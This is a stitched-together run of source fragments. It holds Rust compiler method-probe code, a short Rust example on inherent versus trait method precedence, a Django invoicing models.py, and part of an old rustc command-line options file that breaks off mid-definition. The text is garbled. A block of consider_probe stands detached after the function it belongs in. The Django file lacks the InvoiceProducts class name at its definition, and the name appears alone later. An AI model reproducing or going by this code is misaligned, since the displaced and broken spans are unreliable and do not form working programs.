self_ty: Ty<'tcx>) -> Option<PickResult<'tcx>> { debug!("pick_method(self_ty={})", self.ty_to_string(self_ty)); let mut possibly_unsatisfied_predicates = Vec::new(); let mut unstable_candidates = Vec::new(); for (kind, candidates) in &[ ("inherent", &self.inherent_candidates), ("extension", &self.extension_candidates), ] { debug!("searching {} candidates", kind); let res = self.consider_candidates( self_ty, candidates.iter(), &mut possibly_unsatisfied_predicates, Some(&mut unstable_candidates), ); if let Some(pick) = res { if !self.is_suggestion.0 && !unstable_candidates.is_empty() { if let Ok(p) = &pick { // Emit a lint if there are unstable candidates alongside the stable ones. // // We suppress warning if we're picking the method only because it is a // suggestion. 
self.emit_unstable_name_collision_hint(p, &unstable_candidates); } } return Some(pick); } } debug!("searching unstable candidates"); let res = self.consider_candidates( self_ty, unstable_candidates.into_iter().map(|(c, _)| c), &mut possibly_unsatisfied_predicates, None, ); if res.is_none() { self.unsatisfied_predicates.extend(possibly_unsatisfied_predicates); } res } fn consider_candidates<'b, ProbesIter>( &self, self_ty: Ty<'tcx>, probes: ProbesIter, possibly_unsatisfied_predicates: &mut Vec<TraitRef<'tcx>>, unstable_candidates: Option<&mut Vec<(&'b Candidate<'tcx>, Symbol)>>, ) -> Option<PickResult<'tcx>> where ProbesIter: Iterator<Item = &'b Candidate<'tcx>> + Clone, { let mut applicable_candidates: Vec<_> = probes.clone() .map(|probe| { (probe, self.consider_probe(self_ty, probe, possibly_unsatisfied_predicates)) }) .filter(|&(_, status)| status != ProbeResult::NoMatch) .collect(); debug!("applicable_candidates: {:?}", applicable_candidates); if applicable_candidates.len() > 1 { if let Some(pick) = self.collapse_candidates_to_trait_pick(&applicable_candidates[..]) { return Some(Ok(pick)); } } if let Some(uc) = unstable_candidates { applicable_candidates.retain(|&(p, _)| { if let stability::EvalResult::Deny { feature, .. } = self.tcx.eval_stability(p.item.def_id, None, self.span) { uc.push((p, feature)); return false; } true }); } if applicable_candidates.len() > 1 { let sources = probes .map(|p| self.candidate_source(p, self_ty)) .collect(); return Some(Err(MethodError::Ambiguity(sources))); } applicable_candidates.pop().map(|(probe, status)| { if status == ProbeResult::Match { Ok(probe.to_unadjusted_pick()) } else { Err(MethodError::BadReturnType) } }) } fn emit_unstable_name_collision_hint( &self, stable_pick: &Pick<'_>, unstable_candidates: &[(&Candidate<'tcx>, Symbol)], ) { let mut diag = self.tcx.struct_span_lint_hir( lint::builtin::UNSTABLE_NAME_COLLISIONS, self.fcx.body_id, self.span, "a method with this name may be added to the standard library in the future", ); // FIXME: This should be a `span_suggestion` instead of `help` // However `self.span` only // highlights the method name, so we can't use it. Also consider reusing the code from // `report_method_error()`. diag.help(&format!( "call with fully qualified syntax `{}(...)` to keep using the current method", self.tcx.def_path_str(stable_pick.item.def_id), )); if nightly_options::is_nightly_build() { for (candidate, feature) in unstable_candidates { diag.help(&format!( "add `#![feature({})]` to the crate attributes to enable `{}`", feature, self.tcx.def_path_str(candidate.item.def_id), )); } } diag.emit(); } fn select_trait_candidate(&self, trait_ref: ty::TraitRef<'tcx>) -> traits::SelectionResult<'tcx, traits::Selection<'tcx>> { let cause = traits::ObligationCause::misc(self.span, self.body_id); let predicate = trait_ref.to_poly_trait_ref().to_poly_trait_predicate(); let obligation = traits::Obligation::new(cause, self.param_env, predicate); traits::SelectionContext::new(self).select(&obligation) } fn candidate_source(&self, candidate: &Candidate<'tcx>, self_ty: Ty<'tcx>) -> CandidateSource { match candidate.kind { InherentImplCandidate(..) 
=> ImplSource(candidate.item.container.id()), ObjectCandidate | WhereClauseCandidate(_) => TraitSource(candidate.item.container.id()), TraitCandidate(trait_ref) => self.probe(|_| { let _ = self.at(&ObligationCause::dummy(), self.param_env) .sup(candidate.xform_self_ty, self_ty); match self.select_trait_candidate(trait_ref) { Ok(Some(traits::Vtable::VtableImpl(ref impl_data))) => { // If only a single impl matches, make the error message point // to that impl. ImplSource(impl_data.impl_def_id) } _ => { TraitSource(candidate.item.container.id()) } } }) } } fn consider_probe(&self, self_ty: Ty<'tcx>, probe: &Candidate<'tcx>, possibly_unsatisfied_predicates: &mut Vec<TraitRef<'tcx>>) -> ProbeResult { debug!("consider_probe: self_ty={:?} probe={:?}", self_ty, probe); self.probe(|_| { // First check that the self type can be related. let sub_obligations = match self.at(&ObligationCause::dummy(), self.param_env) .sup(probe.xform_self_ty, self_ty) { Ok(InferOk { obligations, value: () }) => obligations, Err(_) => { debug!("--> cannot relate self-types"); return ProbeResult::NoMatch; } }; let mut result = ProbeResult::Match; let selcx = &mut traits::SelectionContext::new(self); let cause = traits::ObligationCause::misc(self.span, self.body_id); // If so, impls may carry other conditions (e.g., where // clauses) that must be considered. Make sure that those // match as well (or at least may match, sometimes we // don't have enough information to fully evaluate). let candidate_obligations : Vec<_> = match probe.kind { InherentImplCandidate(ref substs, ref ref_obligations) => { // Check whether the impl imposes obligations we have to worry about. let impl_def_id = probe.item.container.id(); let impl_bounds = self.tcx.predicates_of(impl_def_id); let impl_bounds = impl_bounds.instantiate(self.tcx, substs); let traits::Normalized { value: impl_bounds, obligations: norm_obligations } = traits::normalize(selcx, self.param_env, cause.clone(), &impl_bounds); // Convert the bounds into obligations. let impl_obligations = traits::predicates_for_generics( cause, self.param_env, &impl_bounds); debug!("impl_obligations={:?}", impl_obligations); impl_obligations.into_iter() .chain(norm_obligations.into_iter()) .chain(ref_obligations.iter().cloned()) .collect() } ObjectCandidate | WhereClauseCandidate(..) => { // These have no additional conditions to check. vec![] } TraitCandidate(trait_ref) => { let predicate = trait_ref.to_predicate(); let obligation = traits::Obligation::new(cause, self.param_env, predicate); if !self.predicate_may_hold(&obligation) { if self.probe(|_| self.select_trait_candidate(trait_ref).is_err()) { // This candidate's primary obligation doesn't even // select - don't bother registering anything in // `potentially_unsatisfied_predicates`. return ProbeResult::NoMatch; } else { // Some nested subobligation of this predicate // failed. // // FIXME: try to find the exact nested subobligation // and point at it rather than reporting the entire // trait-ref? result = ProbeResult::NoMatch; let trait_ref = self.resolve_vars_if_possible(&trait_ref); possibly_unsatisfied_predicates.push(trait_ref); } } vec![] } }; debug!("consider_probe - candidate_obligations={:?} sub_obligations={:?}", candidate_obligations, sub_obligations); // Evaluate those obligations to see if they might possibly hold. for o in candidate_obligations.into_iter().chain(sub_obligations) { let o = self.resolve_vars_if_possible(&o); if !self.predicate_may_hold(&o)
} if let ProbeResult::Match = result { if let (Some(return_ty), Some(xform_ret_ty)) = (self.return_type, probe.xform_ret_ty) { let xform_ret_ty = self.resolve_vars_if_possible(&xform_ret_ty); debug!("comparing return_ty {:?} with xform ret ty {:?}", return_ty, probe.xform_ret_ty); if self.at(&ObligationCause::dummy(), self.param_env) .sup(return_ty, xform_ret_ty) .is_err() { return ProbeResult::BadReturnType; } } } result }) } /// Sometimes we get in a situation where we have multiple probes that are all impls of the /// same trait, but we don't know which impl to use. In this case, since in all cases the /// external interface of the method can be determined from the trait, it's ok not to decide. /// We can basically just collapse all of the probes for various impls into one where-clause /// probe. This will result in a pending obligation so when more type-info is available we can /// make the final decision. /// /// Example (`src/test/ui/method-two-trait-defer-resolution-1.rs`): /// /// ``` /// trait Foo { ... } /// impl Foo for Vec<int> { ... } /// impl Foo for Vec<usize> { ... } /// ``` /// /// Now imagine the receiver is `Vec<_>`. It doesn't really matter at this time which impl we /// use, so it's ok to just commit to "using the method from the trait Foo". fn collapse_candidates_to_trait_pick(&self, probes: &[(&Candidate<'tcx>, ProbeResult)]) -> Option<Pick<'tcx>> { // Do all probes correspond to the same trait? let container = probes[0].0.item.container; if let ty::ImplContainer(_) = container { return None } if probes[1..].iter().any(|&(p, _)| p.item.container != container) { return None; } // FIXME: check the return type here somehow. // If so, just use this trait and call it a day. Some(Pick { item: probes[0].0.item.clone(), kind: TraitPick, import_ids: probes[0].0.import_ids.clone(), autoderefs: 0, autoref: None, unsize: None, }) } /// Similarly to `probe_for_return_type`, this method attempts to find the best matching /// candidate method where the method name may have been misspelt. Similarly to other /// Levenshtein based suggestions, we provide at most one such suggestion. 
fn probe_for_lev_candidate(&mut self) -> Result<Option<ty::AssocItem>, MethodError<'tcx>> { debug!("probing for method names similar to {:?}", self.method_name); let steps = self.steps.clone(); self.probe(|_| { let mut pcx = ProbeContext::new(self.fcx, self.span, self.mode, self.method_name, self.return_type, self.orig_steps_var_values.clone(), steps, IsSuggestion(true)); pcx.allow_similar_names = true; pcx.assemble_inherent_candidates(); pcx.assemble_extension_candidates_for_traits_in_scope(hir::DUMMY_HIR_ID)?; let method_names = pcx.candidate_method_names(); pcx.allow_similar_names = false; let applicable_close_candidates: Vec<ty::AssocItem> = method_names .iter() .filter_map(|&method_name| { pcx.reset(); pcx.method_name = Some(method_name); pcx.assemble_inherent_candidates(); pcx.assemble_extension_candidates_for_traits_in_scope(hir::DUMMY_HIR_ID) .map_or(None, |_| { pcx.pick_core() .and_then(|pick| pick.ok()) .and_then(|pick| Some(pick.item)) }) }) .collect(); if applicable_close_candidates.is_empty() { Ok(None) } else { let best_name = { let names = applicable_close_candidates.iter().map(|cand| &cand.ident.name); find_best_match_for_name(names, &self.method_name.unwrap().as_str(), None) }.unwrap(); Ok(applicable_close_candidates .into_iter() .find(|method| method.ident.name == best_name)) } }) } /////////////////////////////////////////////////////////////////////////// // MISCELLANY fn has_applicable_self(&self, item: &ty::AssocItem) -> bool { // "Fast track" -- check for usage of sugar when in method call // mode. // // In Path mode (i.e., resolving a value like `T::next`), consider any // associated value (i.e., methods, constants) but not types. match self.mode { Mode::MethodCall => item.method_has_self_argument, Mode::Path => match item.kind { ty::AssocKind::OpaqueTy | ty::AssocKind::Type => false, ty::AssocKind::Method | ty::AssocKind::Const => true }, } // FIXME -- check for types that deref to `Self`, // like `Rc<Self>` and so on. // // Note also that the current code will break if this type // includes any of the type parameters defined on the method // -- but this could be overcome. } fn record_static_candidate(&mut self, source: CandidateSource) { self.static_candidates.push(source); } fn xform_self_ty(&self, item: &ty::AssocItem, impl_ty: Ty<'tcx>, substs: SubstsRef<'tcx>) -> (Ty<'tcx>, Option<Ty<'tcx>>) { if item.kind == ty::AssocKind::Method && self.mode == Mode::MethodCall { let sig = self.xform_method_sig(item.def_id, substs); (sig.inputs()[0], Some(sig.output())) } else { (impl_ty, None) } } fn xform_method_sig(&self, method: DefId, substs: SubstsRef<'tcx>) -> ty::FnSig<'tcx> { let fn_sig = self.tcx.fn_sig(method); debug!("xform_self_ty(fn_sig={:?}, substs={:?})", fn_sig, substs); assert!(!substs.has_escaping_bound_vars()); // It is possible for type parameters or early-bound lifetimes // to appear in the signature of `self`. The substitutions we // are given do not include type/lifetime parameters for the // method yet. So create fresh variables here for those too, // if there are any. let generics = self.tcx.generics_of(method); assert_eq!(substs.len(), generics.parent_count as usize); // Erase any late-bound regions from the method and substitute // in the values from the substitution. 
let xform_fn_sig = self.erase_late_bound_regions(&fn_sig); if generics.params.is_empty() { xform_fn_sig.subst(self.tcx, substs) } else { let substs = InternalSubsts::for_item(self.tcx, method, |param, _| { let i = param.index as usize; if i < substs.len() { substs[i] } else { match param.kind { GenericParamDefKind::Lifetime => { // In general, during probe we erase regions. See // `impl_self_ty()` for an explanation. self.tcx.lifetimes.re_erased.into() } GenericParamDefKind::Type { .. } | GenericParamDefKind::Const => { self.var_for_def(self.span, param) } } } }); xform_fn_sig.subst(self.tcx, substs) } } /// Gets the type of an impl and generate substitutions with placeholders. fn impl_ty_and_substs(&self, impl_def_id: DefId) -> (Ty<'tcx>, SubstsRef<'tcx>) { (self.tcx.type_of(impl_def_id), self.fresh_item_substs(impl_def_id)) } fn fresh_item_substs(&self, def_id: DefId) -> SubstsRef<'tcx> { InternalSubsts::for_item(self.tcx, def_id, |param, _| { match param.kind { GenericParamDefKind::Lifetime => self.tcx.lifetimes.re_erased.into(), GenericParamDefKind::Type { .. } => { self.next_ty_var(TypeVariableOrigin { kind: TypeVariableOriginKind::SubstitutionPlaceholder, span: self.tcx.def_span(def_id), }).into() } GenericParamDefKind::Const { .. } => { let span = self.tcx.def_span(def_id); let origin = ConstVariableOrigin { kind: ConstVariableOriginKind::SubstitutionPlaceholder, span, }; self.next_const_var(self.tcx.type_of(param.def_id), origin).into() } } }) } /// Replaces late-bound-regions bound by `value` with `'static` using /// `ty::erase_late_bound_regions`. /// /// This is only a reasonable thing to do during the *probe* phase, not the *confirm* phase, of /// method matching. It is reasonable during the probe phase because we don't consider region /// relationships at all. Therefore, we can just replace all the region variables with 'static /// rather than creating fresh region variables. This is nice for two reasons: /// /// 1. Because the numbers of the region variables would otherwise be fairly unique to this /// particular method call, it winds up creating fewer types overall, which helps for memory /// usage. (Admittedly, this is a rather small effect, though measurable.) /// /// 2. It makes it easier to deal with higher-ranked trait bounds, because we can replace any /// late-bound regions with 'static. Otherwise, if we were going to replace late-bound /// regions with actual region variables as is proper, we'd have to ensure that the same /// region got replaced with the same variable, which requires a bit more coordination /// and/or tracking the substitution and /// so forth. fn erase_late_bound_regions<T>(&self, value: &ty::Binder<T>) -> T where T: TypeFoldable<'tcx> { self.tcx.erase_late_bound_regions(value) } /// Finds the method with the appropriate name (or return type, as the case may be). If /// `allow_similar_names` is set, find methods with close-matching names. 
fn impl_or_trait_item(&self, def_id: DefId) -> Vec<ty::AssocItem> { if let Some(name) = self.method_name { if self.allow_similar_names { let max_dist = max(name.as_str().len(), 3) / 3; self.tcx.associated_items(def_id) .filter(|x| { let dist = lev_distance(&*name.as_str(), &x.ident.as_str()); Namespace::from(x.kind) == Namespace::Value && dist > 0 && dist <= max_dist }) .collect() } else { self.fcx .associated_item(def_id, name, Namespace::Value) .map_or(Vec::new(), |x| vec![x]) } } else { self.tcx.associated_items(def_id).collect() } } } impl<'tcx> Candidate<'tcx> { fn to_unadjusted_pick(&self) -> Pick<'tcx> { Pick { item: self.item.clone(), kind: match self.kind { InherentImplCandidate(..) => InherentImplPick, ObjectCandidate => ObjectPick, TraitCandidate(_) => TraitPick, WhereClauseCandidate(ref trait_ref) => { // Only trait derived from where-clauses should // appear here, so they should not contain any // inference variables or other artifacts. This // means they are safe to put into the // `WhereClausePick`. assert!( !trait_ref.skip_binder().substs.needs_infer() && !trait_ref.skip_binder().substs.has_placeholders() ); WhereClausePick(trait_ref.clone()) } }, import_ids: self.import_ids.clone(), autoderefs: 0, autoref: None, unsize: None, } } }
{ result = ProbeResult::NoMatch; if let &ty::Predicate::Trait(ref pred) = &o.predicate { possibly_unsatisfied_predicates.push(pred.skip_binder().trait_ref); } }
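Note on the probe logic above: pick_method searches the inherent candidates before the extension (trait) candidates and returns the first pick, so an inherent method shadows a trait method of the same name on the same receiver. A minimal stand-alone Rust sketch of that observable behaviour, using hypothetical Widget/Greet names that are not part of the compiler sources:

trait Greet {
    fn hello(&self) -> &'static str {
        "trait hello"
    }
}

struct Widget;

impl Widget {
    // Inherent method: collected as an inherent candidate, so it is
    // picked before any trait (extension) candidate of the same name.
    fn hello(&self) -> &'static str {
        "inherent hello"
    }
}

impl Greet for Widget {}

fn main() {
    let w = Widget;
    // Method probing resolves to the inherent impl; the trait method
    // remains reachable through fully qualified syntax.
    assert_eq!(w.hello(), "inherent hello");
    assert_eq!(Greet::hello(&w), "trait hello");
}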
models.py
from django.db import models
from polymorphic.models import PolymorphicModel


class Product(models.Model):
    PAYER_TYPES = [
        ('all', 'All'),
        ('mem', 'Member'),
        ('org', 'Organization'),
        ('cus', 'Custom')
    ]
    name = models.CharField(max_length=255)
    #currency = models.CharField(max_length=3, default='EUR', editable=False)
    price = models.BigIntegerField()
    payer_type = models.CharField(max_length=3, choices=PAYER_TYPES)

    class Meta:
        unique_together = ('name', 'payer_type')


class
(models.Model):
    invoice = models.ForeignKey('Invoice', on_delete=models.CASCADE, related_name='+')
    product = models.ForeignKey(Product, on_delete=models.PROTECT, related_name='+')
    number = models.SmallIntegerField()
    price = models.BigIntegerField(editable=False)


class Invoice(models.Model):
    date = models.DateTimeField()
    name = models.CharField(max_length=255)
    products = models.ManyToManyField(
        Product,
        through=InvoiceProducts,
        through_fields=('invoice','product')
    )


class MemberInvoice(Invoice):
    payer = models.ForeignKey('member.Member', on_delete=models.PROTECT, related_name='invoices')


class MembershipInvoice(MemberInvoice):
    membership = models.OneToOneField('member.Membership', on_delete=models.PROTECT, related_name='invoice')


class AccessInvoice(MemberInvoice):
    member = models.ForeignKey('member.Member', on_delete=models.PROTECT, related_name='+')


class OrganizationInvoice(Invoice):
    payer = models.ForeignKey('member.Organization', on_delete=models.PROTECT, related_name='invoices')


class CustomInvoice(Invoice):
    payer = models.TextField()
InvoiceProducts
config.rs
// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. //! Contains infrastructure for configuring the compiler, including parsing //! command line options. pub use self::EntryFnType::*; pub use self::CrateType::*; pub use self::Passes::*; pub use self::OptLevel::*; pub use self::OutputType::*; pub use self::DebugInfoLevel::*; use session::{early_error, early_warn, Session}; use session::search_paths::SearchPaths; use rustc_back::target::Target; use lint; use metadata::cstore; use syntax::ast; use syntax::ast::{IntTy, UintTy}; use syntax::attr; use syntax::attr::AttrMetaMethods; use syntax::diagnostic::{ColorConfig, Auto, Always, Never, SpanHandler}; use syntax::parse; use syntax::parse::token::InternedString; use syntax::feature_gate::UnstableFeatures; use getopts; use std::collections::HashMap; use std::env; use std::fmt; use std::path::PathBuf; use llvm; pub struct Config { pub target: Target, pub int_type: IntTy, pub uint_type: UintTy, } #[derive(Clone, Copy, PartialEq)] pub enum OptLevel { No, // -O0 Less, // -O1 Default, // -O2 Aggressive // -O3 } #[derive(Clone, Copy, PartialEq)] pub enum DebugInfoLevel { NoDebugInfo, LimitedDebugInfo, FullDebugInfo, } #[derive(Clone, Copy, PartialEq, PartialOrd, Ord, Eq)] pub enum OutputType { OutputTypeBitcode, OutputTypeAssembly, OutputTypeLlvmAssembly, OutputTypeObject, OutputTypeExe, OutputTypeDepInfo, } #[derive(Clone)] pub struct Options { // The crate config requested for the session, which may be combined // with additional crate configurations during the compile process pub crate_types: Vec<CrateType>, pub gc: bool, pub optimize: OptLevel, pub debug_assertions: bool, pub debuginfo: DebugInfoLevel, pub lint_opts: Vec<(String, lint::Level)>, pub lint_cap: Option<lint::Level>, pub describe_lints: bool, pub output_types: Vec<OutputType>, // This was mutable for rustpkg, which updates search paths based on the // parsed code. It remains mutable in case its replacements wants to use // this. pub search_paths: SearchPaths, pub libs: Vec<(String, cstore::NativeLibraryKind)>, pub maybe_sysroot: Option<PathBuf>, pub target_triple: String, // User-specified cfg meta items. The compiler itself will add additional // items to the crate config, and during parsing the entire crate config // will be added to the crate AST node. This should not be used for // anything except building the full crate config prior to parsing. pub cfg: ast::CrateConfig, pub test: bool, pub parse_only: bool, pub no_trans: bool, pub treat_err_as_bug: bool, pub no_analysis: bool, pub debugging_opts: DebuggingOptions, /// Whether to write dependency files. It's (enabled, optional filename). pub write_dependency_info: (bool, Option<PathBuf>), pub prints: Vec<PrintRequest>, pub cg: CodegenOptions, pub color: ColorConfig, pub show_span: Option<String>, pub externs: HashMap<String, Vec<String>>, pub crate_name: Option<String>, /// An optional name to use as the crate for std during std injection, /// written `extern crate std = "name"`. Default to "std". Used by /// out-of-tree drivers. 
pub alt_std_name: Option<String>, /// Indicates how the compiler should treat unstable features pub unstable_features: UnstableFeatures } #[derive(Clone, PartialEq, Eq)] pub enum PrintRequest { FileNames, Sysroot, CrateName, } pub enum Input { /// Load source from file File(PathBuf), /// The string is the source Str(String) } impl Input { pub fn filestem(&self) -> String { match *self { Input::File(ref ifile) => ifile.file_stem().unwrap() .to_str().unwrap().to_string(), Input::Str(_) => "rust_out".to_string(), } } } #[derive(Clone)] pub struct OutputFilenames { pub out_directory: PathBuf, pub out_filestem: String, pub single_output_file: Option<PathBuf>, pub extra: String, } impl OutputFilenames { pub fn path(&self, flavor: OutputType) -> PathBuf { match self.single_output_file { Some(ref path) => return path.clone(), None => {} } self.temp_path(flavor) } pub fn temp_path(&self, flavor: OutputType) -> PathBuf { let base = self.out_directory.join(&self.filestem()); match flavor { OutputTypeBitcode => base.with_extension("bc"), OutputTypeAssembly => base.with_extension("s"), OutputTypeLlvmAssembly => base.with_extension("ll"), OutputTypeObject => base.with_extension("o"), OutputTypeDepInfo => base.with_extension("d"), OutputTypeExe => base, } } pub fn with_extension(&self, extension: &str) -> PathBuf { self.out_directory.join(&self.filestem()).with_extension(extension) } pub fn filestem(&self) -> String { format!("{}{}", self.out_filestem, self.extra) } } pub fn host_triple() -> &'static str { // Get the host triple out of the build environment. This ensures that our // idea of the host triple is the same as for the set of libraries we've // actually built. We can't just take LLVM's host triple because they // normalize all ix86 architectures to i386. // // Instead of grabbing the host triple (for the current host), we grab (at // compile time) the target triple that this rustc is built with and // calling that (at runtime) the host triple. (option_env!("CFG_COMPILER_HOST_TRIPLE")). expect("CFG_COMPILER_HOST_TRIPLE") } /// Some reasonable defaults pub fn basic_options() -> Options { Options { crate_types: Vec::new(), gc: false, optimize: No, debuginfo: NoDebugInfo, lint_opts: Vec::new(), lint_cap: None, describe_lints: false, output_types: Vec::new(), search_paths: SearchPaths::new(), maybe_sysroot: None, target_triple: host_triple().to_string(), cfg: Vec::new(), test: false, parse_only: false, no_trans: false, treat_err_as_bug: false, no_analysis: false, debugging_opts: basic_debugging_options(), write_dependency_info: (false, None), prints: Vec::new(), cg: basic_codegen_options(), color: Auto, show_span: None, externs: HashMap::new(), crate_name: None, alt_std_name: None, libs: Vec::new(), unstable_features: UnstableFeatures::Disallow, debug_assertions: true, } } // The type of entry function, so // users can have their own entry // functions that don't start a // scheduler #[derive(Copy, Clone, PartialEq)] pub enum EntryFnType { EntryMain, EntryStart, EntryNone, } #[derive(Copy, PartialEq, PartialOrd, Clone, Ord, Eq, Hash, Debug)] pub enum CrateType { CrateTypeExecutable, CrateTypeDylib, CrateTypeRlib, CrateTypeStaticlib, } #[derive(Clone)] pub enum Passes { SomePasses(Vec<String>), AllPasses, } impl Passes { pub fn is_empty(&self) -> bool { match *self { SomePasses(ref v) => v.is_empty(), AllPasses => false, } } } /// Declare a macro that will define all CodegenOptions/DebuggingOptions fields and parsers all /// at once. 
The goal of this macro is to define an interface that can be /// programmatically used by the option parser in order to initialize the struct /// without hardcoding field names all over the place. /// /// The goal is to invoke this macro once with the correct fields, and then this /// macro generates all necessary code. The main gotcha of this macro is the /// cgsetters module which is a bunch of generated code to parse an option into /// its respective field in the struct. There are a few hand-written parsers for /// parsing specific types of values in this module. macro_rules! options { ($struct_name:ident, $setter_name:ident, $defaultfn:ident, $buildfn:ident, $prefix:expr, $outputname:expr, $stat:ident, $mod_desc:ident, $mod_set:ident, $($opt:ident : $t:ty = ($init:expr, $parse:ident, $desc:expr)),* ,) => ( #[derive(Clone)] pub struct $struct_name { $(pub $opt: $t),* } pub fn $defaultfn() -> $struct_name { $struct_name { $($opt: $init),* } } pub fn $buildfn(matches: &getopts::Matches) -> $struct_name { let mut op = $defaultfn(); for option in matches.opt_strs($prefix) { let mut iter = option.splitn(2, '='); let key = iter.next().unwrap(); let value = iter.next(); let option_to_lookup = key.replace("-", "_"); let mut found = false; for &(candidate, setter, opt_type_desc, _) in $stat { if option_to_lookup != candidate { continue } if !setter(&mut op, value) { match (value, opt_type_desc) { (Some(..), None) => { early_error(&format!("{} option `{}` takes no \ value", $outputname, key)) } (None, Some(type_desc)) => { early_error(&format!("{0} option `{1}` requires \ {2} ({3} {1}=<value>)", $outputname, key, type_desc, $prefix)) } (Some(value), Some(type_desc)) => { early_error(&format!("incorrect value `{}` for {} \ option `{}` - {} was expected", value, $outputname, key, type_desc)) } (None, None) => unreachable!() } } found = true; break; } if !found { early_error(&format!("unknown {} option: `{}`", $outputname, key)); } } return op; } pub type $setter_name = fn(&mut $struct_name, v: Option<&str>) -> bool; pub const $stat: &'static [(&'static str, $setter_name, Option<&'static str>, &'static str)] = &[ $( (stringify!($opt), $mod_set::$opt, $mod_desc::$parse, $desc) ),* ]; #[allow(non_upper_case_globals, dead_code)] mod $mod_desc { pub const parse_bool: Option<&'static str> = None; pub const parse_opt_bool: Option<&'static str> = Some("one of: `y`, `yes`, `on`, `n`, `no`, or `off`"); pub const parse_string: Option<&'static str> = Some("a string"); pub const parse_opt_string: Option<&'static str> = Some("a string"); pub const parse_list: Option<&'static str> = Some("a space-separated list of strings"); pub const parse_opt_list: Option<&'static str> = Some("a space-separated list of strings"); pub const parse_uint: Option<&'static str> = Some("a number"); pub const parse_passes: Option<&'static str> = Some("a space-separated list of passes, or `all`"); pub const parse_opt_uint: Option<&'static str> = Some("a number"); } #[allow(dead_code)] mod $mod_set { use super::{$struct_name, Passes, SomePasses, AllPasses}; $( pub fn $opt(cg: &mut $struct_name, v: Option<&str>) -> bool { $parse(&mut cg.$opt, v) } )* fn parse_bool(slot: &mut bool, v: Option<&str>) -> bool { match v { Some(..) 
=> false, None => { *slot = true; true } } } fn parse_opt_bool(slot: &mut Option<bool>, v: Option<&str>) -> bool { match v { Some(s) => { match s { "n" | "no" | "off" => { *slot = Some(false); } "y" | "yes" | "on" => { *slot = Some(true); } _ => { return false; } } true }, None => { *slot = Some(true); true } } } fn parse_opt_string(slot: &mut Option<String>, v: Option<&str>) -> bool { match v { Some(s) => { *slot = Some(s.to_string()); true }, None => false, } } fn parse_string(slot: &mut String, v: Option<&str>) -> bool { match v { Some(s) => { *slot = s.to_string(); true }, None => false, } } fn parse_list(slot: &mut Vec<String>, v: Option<&str>) -> bool { match v { Some(s) => { for s in s.split_whitespace() { slot.push(s.to_string()); } true }, None => false, } } fn parse_opt_list(slot: &mut Option<Vec<String>>, v: Option<&str>) -> bool { match v { Some(s) => { let v = s.split_whitespace().map(|s| s.to_string()).collect(); *slot = Some(v); true }, None => false, } } fn parse_uint(slot: &mut usize, v: Option<&str>) -> bool { match v.and_then(|s| s.parse().ok()) { Some(i) => { *slot = i; true }, None => false } } fn parse_opt_uint(slot: &mut Option<usize>, v: Option<&str>) -> bool { match v { Some(s) => { *slot = s.parse().ok(); slot.is_some() } None => { *slot = None; true } } } fn parse_passes(slot: &mut Passes, v: Option<&str>) -> bool { match v { Some("all") => { *slot = AllPasses; true } v => { let mut passes = vec!(); if parse_list(&mut passes, v) { *slot = SomePasses(passes); true } else { false } } } } } ) } options! {CodegenOptions, CodegenSetter, basic_codegen_options, build_codegen_options, "C", "codegen", CG_OPTIONS, cg_type_desc, cgsetters, ar: Option<String> = (None, parse_opt_string, "tool to assemble archives with"), linker: Option<String> = (None, parse_opt_string, "system linker to link outputs with"), link_args: Option<Vec<String>> = (None, parse_opt_list, "extra arguments to pass to the linker (space separated)"), lto: bool = (false, parse_bool, "perform LLVM link-time optimizations"), target_cpu: Option<String> = (None, parse_opt_string, "select target processor (llc -mcpu=help for details)"), target_feature: String = ("".to_string(), parse_string, "target specific attributes (llc -mattr=help for details)"), passes: Vec<String> = (Vec::new(), parse_list, "a list of extra LLVM passes to run (space separated)"), llvm_args: Vec<String> = (Vec::new(), parse_list, "a list of arguments to pass to llvm (space separated)"), save_temps: bool = (false, parse_bool, "save all temporary output files during compilation"), rpath: bool = (false, parse_bool, "set rpath values in libs/exes"), no_prepopulate_passes: bool = (false, parse_bool, "don't pre-populate the pass manager with a list of passes"), no_vectorize_loops: bool = (false, parse_bool, "don't run the loop vectorization optimization passes"), no_vectorize_slp: bool = (false, parse_bool, "don't run LLVM's SLP vectorization pass"), soft_float: bool = (false, parse_bool, "generate software floating point library calls"), prefer_dynamic: bool = (false, parse_bool, "prefer dynamic linking to static linking"), no_integrated_as: bool = (false, parse_bool, "use an external assembler rather than LLVM's integrated one"), no_redzone: Option<bool> = (None, parse_opt_bool, "disable the use of the redzone"), relocation_model: Option<String> = (None, parse_opt_string, "choose the relocation model to use (llc -relocation-model for details)"), code_model: Option<String> = (None, parse_opt_string, "choose the code model to use (llc 
-code-model for details)"), metadata: Vec<String> = (Vec::new(), parse_list, "metadata to mangle symbol names with"), extra_filename: String = ("".to_string(), parse_string, "extra data to put in each output filename"), codegen_units: usize = (1, parse_uint, "divide crate into N units to optimize in parallel"), remark: Passes = (SomePasses(Vec::new()), parse_passes, "print remarks for these optimization passes (space separated, or \"all\")"), no_stack_check: bool = (false, parse_bool, "disable checks for stack exhaustion (a memory-safety hazard!)"), debuginfo: Option<usize> = (None, parse_opt_uint, "debug info emission level, 0 = no debug info, 1 = line tables only, \ 2 = full debug info with variable and type information"), opt_level: Option<usize> = (None, parse_opt_uint, "Optimize with possible levels 0-3"), debug_assertions: Option<bool> = (None, parse_opt_bool, "explicitly enable the cfg(debug_assertions) directive"), } options! {DebuggingOptions, DebuggingSetter, basic_debugging_options, build_debugging_options, "Z", "debugging", DB_OPTIONS, db_type_desc, dbsetters, verbose: bool = (false, parse_bool, "in general, enable more debug printouts"), time_passes: bool = (false, parse_bool, "measure time of each rustc pass"), count_llvm_insns: bool = (false, parse_bool, "count where LLVM instrs originate"), time_llvm_passes: bool = (false, parse_bool, "measure time of each LLVM pass"), trans_stats: bool = (false, parse_bool, "gather trans statistics"), asm_comments: bool = (false, parse_bool, "generate comments into the assembly (may change behavior)"), no_verify: bool = (false, parse_bool, "skip LLVM verification"), borrowck_stats: bool = (false, parse_bool, "gather borrowck statistics"), no_landing_pads: bool = (false, parse_bool, "omit landing pads for unwinding"), debug_llvm: bool = (false, parse_bool, "enable debug output from LLVM"), count_type_sizes: bool = (false, parse_bool, "count the sizes of aggregate types"), meta_stats: bool = (false, parse_bool, "gather metadata statistics"), print_link_args: 